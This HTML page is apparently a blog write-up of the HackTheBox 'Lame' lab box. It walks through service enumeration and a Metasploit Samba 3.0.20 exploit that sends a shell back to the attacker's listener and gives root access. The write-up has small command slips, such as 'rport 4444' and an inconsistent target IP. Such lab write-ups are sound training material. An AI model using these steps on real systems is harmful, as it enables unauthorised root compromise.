<!DOCTYPE html>

<html lang="en">

<style>
    body {
        background-color: #363636;
        /* background-color:bisque; */
        color: whitesmoke;
        font-family:Arial, Helvetica, sans-serif
    }

    a {
        text-decoration: none; 
        color: inherit;
    }

    .topnav {
        background-color: #242424;
        overflow: hidden;
        position: fixed;
        width: 100%;
        top: 0;
        right: 0;
    }

    .topnav .name {
        float: left;
        color: #f2f2f2;
        text-align: center;
        padding: 14px 16px;
        text-decoration: none;
        font-size: 17px;
    }

    .topnav a {
        float: right;
        color: #f2f2f2;
        text-align: center;
        padding: 14px 16px;
        font-size: 17px;
    }

    .topnav a:hover {
        background-color: #ddd;
        text-decoration-line: underline;
        color: black;
    }

    .topnav a.active {
        background-color:#0077ff;
        color:white;
    }

    .topnav .center-topnav {
        margin: auto;
        width: 80%;
        max-width: 930px
    }

    .content {
        margin: auto;
        width: 80%;
        max-width: 900px;
        padding-top: 50px;
        display: grid;
        line-height: 1.5em;
        /* border-color: #0077ff; border-width: 2px; border-style: solid; */
    }

    .content p {
        margin-bottom:0px;
    }

    /* .content .cell {
        border-color: green;
        border-width: 2px;im al
        border-style: solid;
    } */

    .content .cell .text {
        margin:auto;
        text-align: center;
    }

    .content h2 {
        margin-top:40px;
        margin-bottom:0px;
    }

    .content h3 {
        margin-bottom:0px;
    }

    .content .box-icon {
        display: block;
        width: 20%;
    }

    pre {
        overflow: auto;
    }

    pre code {
        background-color: #000;
        border: 1px solid #999;
        display: block;
        padding: 15px;
    }

    img {
        width: 80%
    }

    h1, h2 {
        color:#0077ff
    }

    h3 {
        color:#99c9ff
    }

</style>

<head>
    <div class="topnav">
        <div class="center-topnav">
            <a href=/index.html class="name">Jaguar Perlas</a>
            <a class="active" href="/hack/hacks/index.html">Hacks</a>
            <a href="/hack/about.html">About me</a>
            <a href="/hack/index.html">Home</a>
        </div>
    </div>
</head>

<body>
    <div class="content">

        <h1>[Easy] Lame</h1>
        <img class="box-icon" src="../images/lame.png"></img>
        <p><i>Compromised on September 5, 2022</br>Written on January 20, 2024</i></p>
        <p>
            Lame is an easy difficulty box from HackTheBox which is beginner friendly, featuring a Samba exploit and a "seems-to-be-exploitable"
            VSFTPD service. Looking back in the records, this was my first box to pwn outside of certificate studies. This box is also the first
            box released on HackTheBox. As time flies, exploits have become more easier and automated, so I can't say for sure 
            what this box was like when it was first released and what the box creator intended. When I encountered this box, I utilized Metasploit 
            to compromise this machine.
        </p>

        <h2>Enumeration</h2>
        <h3>Nmap</h3>
        <p>With a simple Nmap scan, it looks like there's FTP (21), SSH (22), and SMB (139 & 445).</p>
        <pre><code>nmap 10.10.10.3 -Pn</code></pre>
        <img src="../images/lame1.png">
        <p>Knowing the ports, I further enumerated those ports using Nmap scripts, possibly showing the version of the services and other helpful information.</p>
        <pre><code>nmap 10.10.10.3. -Pn -sC -sV -p21,22,139,445</code></pre>
        <img src="../images/lame2.png">
        <h3>FTP - TCP 21</h3>
        <p>From our Nmap scans, the FTP service is running VSFTPD version 2.3.4 and allows anonymous authentication. I logged into FTP, but didn't find any files stored.</p>
        <pre><code>ftp 10.10.10.3</br>anonymous</br>anonymous</br>ls</code></pre>
        <img src="../images/lame3.png">
        <p>Searching the service version using searchsploit, there is a public exploit that uses Python or Metasploit. Before using this, I continued with my enumeration.</p>
        <pre><code>searchsploit vsftpd 2.3.4</code></pre>
        <img src="../images/lame4.png">
        <h3>SMB - TCP 445</h3>
        <p>From our Nmap scans, the SMB service is running Samba smbd 3.0.20-Debian. First, I used smbmap to enumerate the SMB shares with anonymous login. Looks like
            read and write access is allowed on /tmp</p>
        <pre><code>smbmap -H 10.10.10.3</code></pre>
        <img src="../images/lame5.png">
        <p>Then I used smbclient to connect to the service and viewed the files. The files don't look too interesting here.</p>
        <pre><code>smbclient //10.10.10.4/tmp -N</br>ls</code></pre>
        <img src="../images/lame6.png">
        <p>Searching for a public exploit using searchsploit, there's one suitable for our case. This one uses Metasploit to execute.</p>
        <pre><code>searchsploit samba 3.0.20</code></pre>
        <img src="../images/lame7.png">

        <h2>Exploiting(?) VSFTPD</h2>
        <p>To exploit VSFTPD, I opened Metasploit and searched for the public exploit</p>
        <pre><code>msfconsole</br>search vsftpd 2.3.4</code></pre>
        <img src="../images/lame8.png">
        <p>Now I'll select the exploit, set appropriate options, and execute.</p>
        <pre><code>use 0</br>set rhosts 10.10.10.3</br>run</code></pre>
        <img src="../images/lame9.png"></img>
        <p>Unfortunately, our exploit didn't work. I'll move on and try Samba. </p>

        <h2>Exploiting Samba</h2>
        <p>To exploit Samba 3.0.20, I opened Metasploit and searched for the public exploit.</p>
        <pre><code>msfconsole</br>search samba 3.0.20</code></pre>
        <img src="../images/lame10.png">
        <p>Now I'll select the exploit, set appropriate options, and execute.</p>
        <pre><code>use 0</br>set rhosts 10.10.10.3</br>set lhost 10.10.14.3</br>set rport 4444</br>run</code></pre>
        <img src="../images/lame11.png">
        <p>The exploit automatically puts me as the root user, easily skipping the privilege escalation step needed as a low-privileged user.</br>
            Next I grab the root flag from the /root directory.</p>
        <pre><code>cat /root/root.txt</code></pre>
        <img src="../images/lame12.png">
        <p>I could end off there, but I decided to look and grab the user flag as well.</p>
        <pre><code>cd /home</br>ls</br>cd makis</br>ls</br>cat user.txt</code></pre>
        <img src="../images/lame13.png">
        <p>Full compromise.</p>

    </div>
</body>

</html>